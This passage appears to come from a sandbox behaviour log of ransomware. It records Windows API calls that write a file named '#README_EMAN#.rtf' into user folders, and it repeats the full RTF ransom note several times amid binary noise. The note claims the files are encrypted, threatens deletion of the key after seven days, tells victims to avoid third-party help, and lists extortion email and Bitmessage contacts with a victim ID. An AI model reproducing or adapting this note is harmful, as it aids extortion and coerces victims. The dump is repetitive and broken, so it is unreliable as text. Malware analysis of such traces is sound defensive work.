your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9aÓM", lpUsedDefaultChar=0x0) returned 8717 [0295.476] WriteFile (in: hFile=0x2ec, lpBuffer=0x24657d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24657d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0295.477] CloseHandle (hObject=0x2ec) returned 1 [0295.477] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\#readme_eman#.rtf")) returned 0xffffffff [0295.477] GetLastError () returned 0x2 [0295.477] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0295.506] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.506] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.506] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 